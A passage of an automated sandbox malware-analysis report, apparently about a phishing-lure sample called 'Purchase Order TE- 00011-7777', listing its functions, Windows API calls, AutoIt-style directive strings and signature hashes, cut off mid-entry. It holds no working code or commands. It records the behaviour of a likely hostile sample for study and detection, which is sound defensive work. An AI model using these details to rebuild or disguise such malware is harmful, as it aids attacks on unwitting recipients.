                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                      • String ID: X
                      • API String ID: 774024439-3081909835
                      • Opcode ID: 661a1985f1a566315dfe005907c9348a410e4d99a5af79fc2259d888187c014a
                      • Instruction ID: 665e7c51e9a6bf088e72296f0e6fa1c0062bf61cdd462433b8948d69f1a4ee37
                      • Opcode Fuzzy Hash: 661a1985f1a566315dfe005907c9348a410e4d99a5af79fc2259d888187c014a
                      • Instruction Fuzzy Hash: A2C161316087509FCB14EF24C991A9EB7E4FF85310F00496DF89A9B2A2DB30ED45CB92
                      Function 00AAB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 161f31cb96887c469af790153b399788577f5060dd26984cf45d789fba5a8b26
                      • Instruction ID: 38a8f1e90f3ccf52177e5a23a7dfdd86b23a4f672735812fe49906ea3243685d
                      • Opcode Fuzzy Hash: 161f31cb96887c469af790153b399788577f5060dd26984cf45d789fba5a8b26
                      • Instruction Fuzzy Hash: 70714A7191010AEFCB15CF98CC89ABEBB74FF8A314F148159F916AB292C7359A51CB60
                      Function 00AF2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AF214B
                      • _memset.LIBCMT ref: 00AF2214
                      • ShellExecuteExW.SHELL32(?), ref: 00AF2259
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                      • CloseHandle.KERNEL32(00000000), ref: 00AF2320
                      • FreeLibrary.KERNEL32(00000000), ref: 00AF232F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                      • String ID: @
                      • API String ID: 4082843840-2766056989
                      • Opcode ID: a144da1914adc740bbc5e78aee7801767c62392e1b752283c55b334e2a2da9c0
                      • Instruction ID: 13ed0317898eb1f75f63d3160c3c2c0e534ab034551ac66749378a4c5baf9299
                      • Opcode Fuzzy Hash: a144da1914adc740bbc5e78aee7801767c62392e1b752283c55b334e2a2da9c0
                      • Instruction Fuzzy Hash: 94718C71A00619DFCF14EFA8CA81AAEBBF5FF49310F108559E956AB351DB34AD40CB90
                      Function 00AD47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 00AD481D
                      • GetKeyboardState.USER32(?), ref: 00AD4832
                      • SetKeyboardState.USER32(?), ref: 00AD4893
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AD48C1
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AD48E0
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AD4926
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AD4949
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 1f1db06a1ccbc2c22d4482b1dcb13582023cca30e80b61b7039ad3203f377cc1
                      • Instruction ID: b630f6ee18f342c77eccca71acfecfefb80dc19767a3741c6791c5427aeff23e
                      • Opcode Fuzzy Hash: 1f1db06a1ccbc2c22d4482b1dcb13582023cca30e80b61b7039ad3203f377cc1
                      • Instruction Fuzzy Hash: A751D4A05087D13EFB364724CC55BBBBFA95B0A304F08858AE1D656AC2C6E4EC84E750
                      Function 00AD45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(00000000), ref: 00AD4638
                      • GetKeyboardState.USER32(?), ref: 00AD464D
                      • SetKeyboardState.USER32(?), ref: 00AD46AE
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AD46DA
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AD46F7
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AD473B
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AD475C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 06bcccb1f0752f12cefb3930d0eec68951a6c56138384352269274213a1cffe8
                      • Instruction ID: 5e78d263225439fdfb6f4a552dea2af533bfdf8dafa6906fabbdd77a0537445d
                      • Opcode Fuzzy Hash: 06bcccb1f0752f12cefb3930d0eec68951a6c56138384352269274213a1cffe8
                      • Instruction Fuzzy Hash: 9751E8A05047D53FFB3687248C45BBABFA96B0B304F08848AE1E756AC2D7B4EC94D750
                      Function 00AD86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcsncpy$LocalTime
                      • String ID:
                      • API String ID: 2945705084-0
                      • Opcode ID: 0b7d720109e4f3056aa99a49f5f2861a3fa83c9b9f6c5d0e42fe3b2dbd045e28
                      • Instruction ID: a538a293f400c2a4ee25122dcbbf366efcb75691f00576c6928077c57ca16e13
                      • Opcode Fuzzy Hash: 0b7d720109e4f3056aa99a49f5f2861a3fa83c9b9f6c5d0e42fe3b2dbd045e28
                      • Instruction Fuzzy Hash: 63413C65C1021476CB10EBF5C887ACFB7BCAF15350F908867E929F3222EA34E65587E5
                      Function 00AE936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                      Download Yara Rule
                      APIs
                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00AE9409
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9416
                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00AE943A
                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00AE9452
                      • _strlen.LIBCMT ref: 00AE9484
                      • _memmove.LIBCMT ref: 00AE94CA
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE94F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLast$_memmove_strlenselect
                      • String ID:
                      • API String ID: 2795762555-0
                      • Opcode ID: 6b04874a23b7c82cc62fbae5638af01b1e8f239d7e2d5c54aa2533251b269d12
                      • Instruction ID: f3a19b10384a9190851a70a9e998c8de750c5c9cfa71ff8caf14f313fc7b3479
                      • Opcode Fuzzy Hash: 6b04874a23b7c82cc62fbae5638af01b1e8f239d7e2d5c54aa2533251b269d12
                      • Instruction Fuzzy Hash: D9417275600248AFDB14EBA5CD95EEEB7BDEF48310F108169F516972D2DB30AE41CB60
                      Function 00AF9D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AF9DB0
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9E57
                      • IsMenu.USER32(?), ref: 00AF9E6F
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9EB7
                      • DrawMenuBar.USER32 ref: 00AF9ED0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert_memset
                      • String ID: 0
                      • API String ID: 3866635326-4108050209
                      • Opcode ID: a00b728af65b2175d548c5e9a463cf12a44fd292c63866847163db680c8beb7c
                      • Instruction ID: 677b27751887ae9b56808dc5113d938baaf532f5ce89a04330ca5d8a39cbab83
                      • Opcode Fuzzy Hash: a00b728af65b2175d548c5e9a463cf12a44fd292c63866847163db680c8beb7c
                      • Instruction Fuzzy Hash: B2410375A00309EFDB20DF94D884BEABBB9FB09354F04846AFA1997251D730AE54CB60
                      Function 00AF3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00AF3C92
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF3CBC
                      • FreeLibrary.KERNEL32(00000000), ref: 00AF3D71
                        • Part of subcall function 00AF3C63: RegCloseKey.ADVAPI32(?), ref: 00AF3CD9
                        • Part of subcall function 00AF3C63: FreeLibrary.KERNEL32(?), ref: 00AF3D2B
                        • Part of subcall function 00AF3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AF3D4E
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AF3D16
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                      • String ID:
                      • API String ID: 395352322-0
                      • Opcode ID: 73080869b35aee0b4ca7a1cb8838c98a94fd067f9ed2b11b2df747be8cf06e27
                      • Instruction ID: ca39917dd06ba4c82e38f8b87432b28ed112cbd659468d685a1bff407a852298
                      • Opcode Fuzzy Hash: 73080869b35aee0b4ca7a1cb8838c98a94fd067f9ed2b11b2df747be8cf06e27
                      • Instruction Fuzzy Hash: 46311872900209BFDF159BD4DC89AFEB7BCEF08340F50456AB612A3150DA709F498B60
                      Function 00AF8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AF8DF4
                      • GetWindowLongW.USER32(013802C0,000000F0), ref: 00AF8E27
                      • GetWindowLongW.USER32(013802C0,000000F0), ref: 00AF8E5C
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AF8E8E
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AF8EB8
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AF8EC9
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AF8EE3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: 51fa828be576f8fd5c14876c7264696d5ff64c82a9638860b1220de7c03c9e06
                      • Instruction ID: 68166391e14d37f6a19d07cf422674f135e385bf22bb9994f370b062769ce67b
                      • Opcode Fuzzy Hash: 51fa828be576f8fd5c14876c7264696d5ff64c82a9638860b1220de7c03c9e06
                      • Instruction Fuzzy Hash: AD311F31600219AFDB20CF98DC89FA53BA5FB4A754F1945A8F6158B2B2CF75EC40DB40
                      Function 00AD16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1734
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD175A
                      • SysAllocString.OLEAUT32(00000000), ref: 00AD175D
                      • SysAllocString.OLEAUT32(?), ref: 00AD177B
                      • SysFreeString.OLEAUT32(?), ref: 00AD1784
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00AD17A9
                      • SysAllocString.OLEAUT32(?), ref: 00AD17B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: 8e4d29db277461a66ca678f705e172829bd712e62a5710aad201055a188b1705
                      • Instruction ID: b7556c195dc4d696cadeae6ab2a519c2cd4389e61c60221c7c96ae235d36df34
                      • Opcode Fuzzy Hash: 8e4d29db277461a66ca678f705e172829bd712e62a5710aad201055a188b1705
                      • Instruction Fuzzy Hash: 7E216275600219BF9B109BA8DC88CEB77ECEB09360B408526F916DB361DB74EC418B60
                      Function 00AD69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                      • lstrcmpiW.KERNEL32(?,?), ref: 00AD6A2B
                      • _wcscmp.LIBCMT ref: 00AD6A49
                      • MoveFileW.KERNEL32(?,?), ref: 00AD6A62
                        • Part of subcall function 00AD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                        • Part of subcall function 00AD6D6D: GetLastError.KERNEL32 ref: 00AD6DC5
                        • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                      • _wcscat.LIBCMT ref: 00AD6AA4
                      • SHFileOperationW.SHELL32(?), ref: 00AD6B0C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                      • String ID: \*.*
                      • API String ID: 2323102230-1173974218
                      • Opcode ID: 1ebc9c77d9d9cb3512fef5e996bda140a7f2205e1531bb7647c00277da8d2323
                      • Instruction ID: 28857fe3dec35e7304a4db3bd4e4e37a9e48d34013b09fbc25f35cec9cbeccdd
                      • Opcode Fuzzy Hash: 1ebc9c77d9d9cb3512fef5e996bda140a7f2205e1531bb7647c00277da8d2323
                      • Instruction Fuzzy Hash: 993123719002186ACF50EFB4E945ADDB7B8AF08340F5045EBE55AE3251EB349B89CB64
                      Function 00AD2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 1038674560-2734436370
                      • Opcode ID: e8e02196f001f14954d8770591d416e66981c9a52c92b14aaef4a8cea30d75bf
                      • Instruction ID: 651fa8d723c3546a38164eb4a8ed007b811180678c56eda84fa3c1e3cd8b707e
                      • Opcode Fuzzy Hash: e8e02196f001f14954d8770591d416e66981c9a52c92b14aaef4a8cea30d75bf
                      • Instruction Fuzzy Hash: 0B21077220462176D631A7389D02FF773ECDF69310F544527F58787296EB919A82C392
                      Function 00AD17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD180D
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1833
                      • SysAllocString.OLEAUT32(00000000), ref: 00AD1836
                      • SysAllocString.OLEAUT32 ref: 00AD1857
                      • SysFreeString.OLEAUT32 ref: 00AD1860
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00AD187A
                      • SysAllocString.OLEAUT32(?), ref: 00AD1888
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: 7ebfe1f3cb773fd2bb8c9fd7abd4e30dba7af9857fc76bb269d50132d4f7595d
                      • Instruction ID: cf750c8df2ae848ad7cb5abdf7b63f4b45cdd7e943adf91bf6ce5b930c0ff629
                      • Opcode Fuzzy Hash: 7ebfe1f3cb773fd2bb8c9fd7abd4e30dba7af9857fc76bb269d50132d4f7595d
                      • Instruction Fuzzy Hash: 3C211275604204BF9B10DBE8DC89DEE77ECEB09360B408126F915DB361EA74EC419B64
                      Function 00AFA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                        • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                        • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AFA13B
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AFA148
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AFA153
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AFA162
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AFA16E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: 617f53023a2e65fd3408641ee083fcf956edc3341c9ff3a7c24f63ded6f74800
                      • Instruction ID: af571a6cdb97a67690d7039ec3dd74cc4f809591bcbbf7086bba590c01674067
                      • Opcode Fuzzy Hash: 617f53023a2e65fd3408641ee083fcf956edc3341c9ff3a7c24f63ded6f74800
                      • Instruction Fuzzy Hash: C11151B155021DBEEB119FA5CC85EE77F6DEF09798F014215F608A7090CA729C21DBA4
                      Function 00AAC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?,?), ref: 00AAC6C0
                      • GetWindowRect.USER32(?,?), ref: 00AAC701
                      • ScreenToClient.USER32(?,?), ref: 00AAC729
                      • GetClientRect.USER32(?,?), ref: 00AAC856
                      • GetWindowRect.USER32(?,?), ref: 00AAC86F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
